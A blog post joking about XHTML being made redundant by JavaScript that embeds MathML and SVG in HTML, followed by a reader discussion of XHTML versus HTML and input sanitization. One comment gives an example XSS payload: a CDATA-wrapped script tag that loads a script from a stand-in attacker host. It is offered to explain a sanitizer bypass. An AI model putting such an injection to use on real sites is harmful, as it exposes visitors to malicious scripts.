Revenge is a Dish Best Served Cold

Via Jacques, it looks like Sam Ruby has written some JavaScript that enables you to embed MathML and SVG in an HTML 4 document. XHTML is no longer required. Wow. Ever since XHTML came out, the only thing XHTML 1.1 has been able to do that HTML 4.01 couldn’t do was embed MathML and SVG. Now that’s gone.

There is also a little historical irony here.

At the 2004 W3C Workshop on Web Applications and Compound Documents, prominent W3C member and co-inventor of CSS Bert Bos went on record saying that JavaScript is the worst invention ever.

That always seemed harsh to me. Sure, JavaScript can be dangerous. You can easily shoot yourself in the face with it, boy howdy. But really, the worst invention ever? No wonder that Brendan Eich, inventor of JavaScript, expressed his irritation at the time — although this was less over the W3C calling his “baby” ugly and more about the disconnect between W3C’s recent work and the actual needs of web developers. In fact, it was right about this time that the WHATWG started picking up steam. But that’s another story.

Now fast-forward a couple of years. XHTML was the W3C’s baby.[1] But with a not-particularly-long snippet of JavaScript, Sam Ruby has kicked the chair out from under XHTML. Actually, that’s not really the right image. Imagine a man with a chiseled jaw in a nearly immaculate tuxedo, Agent XHTML, clinging desperately to the edge of a sheer cliff with just two fingers. A dark, menacing, bearded figure approaches. “So,” he sneers, “you’re the best the W3C has?” Agent X looks up. “Ruby. I should have known you’d become a minion of J.A.V.A.S.C.R.I.P.T. Your evil master will never succeed in poisoning the World Wide Web!” Ruby just shrugs. “It’s a long way down, Agent X,” he says. Then he stomps on Agent XHTML’s fingers. The tuxedoed man plummets, screaming all the way down. Meanwhile, somewhere from his underground lair, the shadowy criminal mastermind known only as “Mr. Eich” watches all of this from a screen, stroking his pet cat thoughtfully. Hmmm, or does Brendan have a shark tank? Because that would be totally awesome.

1. Or more accurately, the last thing they’ve thrown over the wall to webdevs in the last five years.

17 thoughts on “Revenge is a Dish Best Served Cold

  1. I disagree. XHTML is still really useful – because it is XML. I understand the frustration at the pie-in-the-sky development model the W3C seems to use, but XHTML solves a fundamental, real-life problem, namely that structurally sound output generation (which is difficult to do right in HTML, and has huge security implications).

    XHTML still serves a purpose.

  2. Hi Eamon — I tried to put my comments on your blog entry, but there was a Blogger error and I can’t tell if my post got eaten. So I’ll reproduce the comment here as well:

    Hi Eamon,

    First, thanks very much for writing, and your thoughts on the matter.

    On the screenscraping issue. First, let’s note the interesting fact that you already have to pass the site through Tidy, whether or not the owner of the site claims that the page is “XHTML”. That’s because you and I both know that over 90% of the time (really! I’ve measured this), passing that “XHTML” page through an XML parser would blow up our parser. 😉 This should be a big red flag about XHTML and any benefits about its purported XML nature right there.

    Second, there are plenty of fine tools for parsing and screenscraping HTML. Python’s SGMLParser, for instance, has worked great for my purposes. Anything you can Tidy and scrape as XHTML, I can Tidy and scrape as HTML — or often, I can just scrape as HTML.

    Third, screenscraping is a bad idea for anything other than the quickest-and-dirtiest kind of software. This is because the owner of the site almost certainly doesn’t know or care that they are providing structured data to you. There’s no contract here. If they *did* care about this they would provide a real API or at least an RSS/Atom feed.

    On XHTML security. The MySpace XSS vulnerability relies on invalid HTML. Allow me to officially speak with my “Evan Goer” hat on, and not my “Employee of a competitor of MySpace” hat on: MySpace was utterly stupid to allow that sort of unsanitzed user input to go through.

    You are right that forcing user input to be valid XHTML significantly reduces your attack surface. But so would forcing user input to be valid HTML. Tidy and its libraries are perfectly capable of cleaning up bad HTML (or rejecting stuff that is too pathological). If you can produce a tool that generates valid XML, you can produce a tool that generates valid HTML too.

    But MORE important: the real lesson, and one that is repeated over and over by security experts at my company and elsewhere, is that you cannot trust user input and you must sanitize the hell out of it. If you do want to allow any sort of structured user input, any sane user input system only allows a small, explicit subset of elements and attributes. Please, I beg you, do not rely on creating valid HTML or XHTML for sanitization. If you allow arbitrary valid (X)HTML, you will get owned. (Actually, the best thing of all is not to build your own sanitization system, but to take one that has already been well-tested in the wild.)

    Since we’re on the subject of parser bugs, here’s a nasty remote execution vulnerability from a month ago that affected Drupal, due to a bug in its XML parser:

    http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-10/msg00320.html

    If you search for “XML parser vulnerability” or “XML parser XSS” or the like, it’s easy to find many more such issues…

  3. An addendum about the security approach: at my company, some business units (“properties”) have tried a whitelist of elements and attributes, some have tried a blacklist of elements and attributes. My understanding is that every time a property used the blacklist approach, they were very, very sorry.

  4. Hi, Sam! Hmmm. Right now I could update my feed from a rather crappy CDATA-escaped Atom 0.3 to Atom 1.0. But I won’t be able to wean myself off of CDATA until after I upgrade Movable Type 2.x (end of December) at the earliest. Is that acceptable?

  5. Well, the “you would make a nice addition to my planet” bit sounded so gosh darn ominous. I was kinda worried what would happen if I failed to pay obeisance to our new Planetary Overlord.

  6. Sorry about the posting issue; the posts weren’t eaten and are now online. In (an apparently vain) attempt to avoid supporting an install of yet another piece of software I hoped blogger would Just Work; since all dynamic content is hosted – and hopefully secured – by blogger/google, security issues should be less of my problem. However; the ftp-publishing is very delayed (it seems I need to manually intervene or wait for a long long time for it to update the site) which is very confusing if that’s not what you’re expecting.

    In any case, you rightly point out that XHTML as a security measure is something superfluous: you could just as well parse and validate HTML, and then process that. But why do it the easy way….

    The issue is clearly that the browser trusts all content coming from a server identically – and fails to distinguish between content permitted to do things and potentially foreign “embedded” content. The only way to be safe is to avoid embedded content completely – you can only ever send content which does not contain any hidden information that you don’t process when the browser does.

    We need to have a meaningful internal representation of HTML content. With that, we can meaningfully sanitize by whitelisting (and even then, corner cases like user-provided links, CSS styles, etc etc need to be dealt with). And this is the crux; that’s much much easier to do if the programming environment supports having such an internal representation. Sure, you can make your own HTML parser or try to take an existing one; but none of that is as easy as using the rich XML support most languages offer.

    I don’t think it’s really possible to make a HTML sanitizer on plain strings. And converting to and from XML and dealing with XML internally is simpler than dealing with HTML internally.

    Of course, you’d be crazy to assume that XHTML in the wild is valid – of course it’s not. But it’s not really that important, is it?

  7. Well, Sam said in one sentence what I was fumbling around trying to say for several paragraphs. Glad my job doesn’t depend on being able to concisely explain technical subjects or anything like that.

    Eamon, maybe this is really all about aesthetics? Anyone can work out the sanitization part of their CMS — or heck, the entire CMS itself — any way they like. People who have built their own blogging software or CMS often use XML+XSLT, and they often say that they just really like the fact that their software is XML end-to-end. Producing HTML 4 at the last step just seems artificial to them. I can’t argue with that.

    But from my perspective, their system is a black box. Maybe their source is XML, maybe it’s flat files, maybe they’re using a bootleg copy of AOL Server 2.0, I don’t know. I only see what they send to the browser. And what bothers my sense of aesthetics is serving up a mishmash of angle brackets that maybe should be one thing, but actually gets parsed as something else, and basically ends up being neither. (Or you can try to deliver your XML so that the browsers parse it as XML… which is more aesthetically pleasing, but also much more dangerous.)

    Finally I do think it is neat that the (X)HTML 5 folks are trying to reconcile the nasty mess I described above. Maybe HTML 5 will end up satisfying aesthetes from both schools, server-side and client-side.

  8. I agree that sending text to some clients right now is better done as HTML not XHTML. You should not send XML-encoded HTML as if it were HTML with content-type text/html because… well… it’s not ;-). However, it’s trivial to output validly encoded html using xslt; so you can pretend you’re using XHTML right up until that last step.

    As far as I can tell, valid encoding is much more important that valid structure. It’s nice to have both of course – but if you accidentally place text where none is allowed, or leave out an alt-attribute on some non-semantic image, you’re unlikely to have many problems, even though you’re technically producing invalid html.

    I’m curious why you say sending xml as xml is much more dangerous? The web framework we’re using here can transparently switch between server-side XSLT transforming to HTML 4 on the client, and client-side XSLT. Since the only output to ever reach the browser is output generated by an xml serializer, the only way to produce invalid xml is either by trying hard (some serializers allow explicit hacks, which you should try not to use of course) or by a bug in the serializer. I’ve not encountered one yet, and given the far simpler structure of xml vs. html, I don’t expect there to be nearly as many.

    I can give you ammo for not producing XHTML server side and sending it as HTML (i.e. content-type text/html): The browser will interpret is as html then, and that does not quite follow xml rules. It therefore becomes possible to perform smart injection attacks again because the model you’re producing isn’t the one the client will see.

    So I guess your approach to this is the only correct one: if you’re producing HTML, then produce HTML, and not XHTML. I was conflating that with server-side processing, which I’m still pretty sure, you should only do using a syntax guaranteeing serializer (say, DOM, XSLT, or a number of push or pull models).

  9. Yeah, exactly… the “but it’s not!” part is what offends my aesthetics. 🙂 (Not that I can’t ignore my sense of aesthetics if I have to.)

    Oh, and I just say serving XHTML as XML is dangerous because it raises the possibility of the Yellow Screen of Death. For some backend systems, the odds of this happening will be practically zero, others will be at higher risk. Either way, it’s still a risk.

    That injection attack vector sounds interesting. Do you have a concrete example?

  10. The injection attack vector would be something containing a cdata section for instance. In xhtml this would be a properly escaped string, but in html it has no meaning, so you could for instance embed script tags in it. So for instance something like this:


    <![CDATA[ >
    <script src="http://evilhaxor.org/evilscript.js"></script>
    < ]]>

    PS. How is blogspot questionable content? Now i can’t enter the url of my blog -.-

  11. Ah, thanks Mark.

    Sorry about blocking Blogspot. About a year back, I was getting a storm of blog spam claiming to be from there, so I got irritated and just blacklisted the entire domain. But now that I’ve added that cheesy “Your Favorite Color” field, blog spam has dropped to practically zero, for now. So I’ve renabled blogspot. Crossing my fingers..

Comments are closed.